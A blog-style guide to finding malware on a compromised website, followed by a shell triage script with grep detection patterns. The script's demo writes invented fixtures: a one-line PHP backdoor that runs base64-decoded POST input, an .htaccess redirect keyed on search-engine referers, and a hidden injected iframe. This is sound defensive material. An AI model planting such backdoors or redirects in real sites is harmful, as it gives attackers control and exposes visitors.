Here's a simple hierarchy that I
find helpful when looking into a
website that may have been compromised
for the purpose of spreading malware.
The first step, of course, is to download a complete copy of the website to look at all the code. Two practical points about that copy: pull it over SFTP or SCP rather than plain FTP, so the credentials and the files do not travel in the clear, and make sure the transfer preserves the server's modification times (rsync -a does; many FTP clients do not), because one of the steps below depends on them. I'm writing here as if you've already done that.
What next?
Once you have the entire file hierarchy
for the website on your hard drive, I'd
look for malware following these steps:
- Look for .htaccess files in the root directory of the website and in all the sub-directories. Under Unix (Linux), find . -name .htaccess lists every one, including those buried in upload or cache folders where nobody normally looks.
- Study the .htaccess files. Make sure there is no evidence of the bad guys in these files: rewrite rules that send visitors to an outside domain, especially when conditioned on HTTP_REFERER or HTTP_USER_AGENT so that only search-engine traffic is redirected; php_value auto_prepend_file or auto_append_file lines; and AddHandler lines that make image or text files execute as PHP.
- Make a study of timestamps for the website's files and directories. Under Unix (Linux), the ls -lt command is very useful for this purpose, and find . -type f -mtime -7 narrows the list to files changed in the last week. Look for recently altered files. Keep in mind that modification time can be set to anything with touch, so do a second pass with ls -lct (sorted by change time, which is much harder to forge), and treat an old-looking timestamp as no proof that a file is clean.
- Study the contents of recently altered files for evidence of the bad guys. In PHP the usual tells are eval(), base64_decode(), gzinflate(), str_rot13() and code that executes whatever arrives in $_POST or $_GET, along with very long single lines of encoded text.
- Dump the website database and read through it for evidence of the bad guys. Injected <script> and <iframe> tags in stored post or page content, and administrator accounts nobody remembers creating, are the common findings.
Using these steps, you may have some luck
and discover very quickly how the bad guys
have compromised your website.
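Here is the same five-step triage written as a shell script. This is an added example, not code from the original post; it assumes a PHP-based site whose copy kept the server's modification times, that the database dump has been saved as dump.sql inside the copy, and that the "suspicious" patterns are a starting list rather than a complete one. The sample tree it builds (a clean and an injected .htaccess, a backdoor in an uploads folder, a dump with an injected iframe) is invented so the script can be run offline.

```shell
#!/bin/sh
# Added example (not from the original post): first-pass triage of a
# downloaded site copy, following the five steps above.
# Assumptions: the copy preserved server modification times, the site is
# PHP-based, and a database dump is stored as dump.sql inside the copy.
# All paths, file names and patterns below are illustrative.

# Directives attackers commonly add to .htaccess: redirects keyed on
# referer/user-agent, rewrites to an outside host, prepended PHP, and
# handlers that execute non-PHP extensions as PHP.
HTACCESS_PAT='HTTP_(REFERER|USER_AGENT)|RewriteRule.*https?://|auto_(prepend|append)_file|AddHandler|ErrorDocument.*https?://'

# Constructs typical of injected PHP backdoors.
CODE_PAT='eval\(|base64_decode|gzinflate|str_rot13|\$_(POST|GET|REQUEST)\['

# Markup typically injected into stored page content.
DB_PAT='<script|<iframe|document\.write'

# Step 1: every .htaccess in the tree, however deep.
find_htaccess() {
  find "$1" -name .htaccess
}

# Step 2: only the .htaccess files containing a suspicious directive.
suspicious_htaccess() {
  find "$1" -name .htaccess -exec grep -lE "$HTACCESS_PAT" {} + || true
}

# Step 3: files modified within the last $2 days, listed with ls -lt as in
# the post (newest first; with a huge tree ls may run in several batches).
recent_files() {
  find "$1" -type f -mtime -"$2" -exec ls -lt {} + || true
}

# Step 4: recently modified web files that contain backdoor constructs.
suspicious_code() {
  find "$1" -type f -mtime -"$2" \( -name '*.php' -o -name '*.js' -o -name '*.html' \) \
    -exec grep -lE "$CODE_PAT" {} + || true
}

# Step 5: lines of the SQL dump carrying injected markup (line number + row).
suspicious_db_rows() {
  grep -nE "$DB_PAT" "$1" || true
}

# Constructed sample site so the script runs offline: a clean .htaccess and
# index.php dated 2013, an injected .htaccess, a backdoor, and a dump with
# one injected iframe. All of it is invented for this example.
make_sample_site() {
  site=$(mktemp -d)
  mkdir -p "$site/wp-content/uploads/2013"
  printf 'RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n' > "$site/.htaccess"
  printf '<?php echo "hello"; ?>\n' > "$site/index.php"
  printf 'RewriteCond %%{HTTP_REFERER} google\\.com [NC]\nRewriteRule .* http://example.invalid/go.php [R=302,L]\n' \
    > "$site/wp-content/uploads/.htaccess"
  printf '<?php eval(base64_decode($_POST["x"])); ?>\n' > "$site/wp-content/uploads/2013/cache.php"
  printf "INSERT INTO wp_posts VALUES (1,'<p>Welcome</p>');\n" > "$site/dump.sql"
  printf "INSERT INTO wp_posts VALUES (2,'<p>hi</p><iframe src=\"http://example.invalid/x\" width=0 height=0></iframe>');\n" \
    >> "$site/dump.sql"
  # Backdate the two legitimate files so the timestamp step has something to separate.
  touch -t 201301010000 "$site/.htaccess" "$site/index.php"
  echo "$site"
}

# Run all five steps over a site copy (pass the path of your own copy).
run_triage() {
  site=$1
  echo "== .htaccess files =="; find_htaccess "$site"
  echo "== suspicious .htaccess =="; suspicious_htaccess "$site"
  echo "== changed in the last 7 days =="; recent_files "$site" 7
  echo "== suspicious recent code =="; suspicious_code "$site" 7
  echo "== suspicious database rows =="; suspicious_db_rows "$site/dump.sql"
}

# sh triage.sh --demo  builds the constructed tree, triages it, and removes it.
if [ "${1:-}" = "--demo" ]; then
  demo=$(make_sample_site)
  run_triage "$demo"
  rm -rf "$demo"
fi
```

Run it with sh triage.sh --demo to see the constructed case, or call run_triage with the path of your own copy. The patterns only catch the well-known tells; code that has been obfuscated past them will slip through, which is exactly why the timestamp step and a human read of the recent files still matter.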
Here's why this is helpful:
Looking randomly for something in a large
field of possibilities is extremely time-
consuming and often brings no results.
Instead of looking randomly, use a little
imagination. Imagine how your website
might have been compromised and look in
the high-suspicion places first.
I often find it helpful to take a little
time off and let my intuition kick in.
Usually I'm better off if I have some idea
what I'm looking for when I'm trying to find
out how a website was compromised.
In other words, a highly directed search is
so much better than a totally random search.
Ed Abbott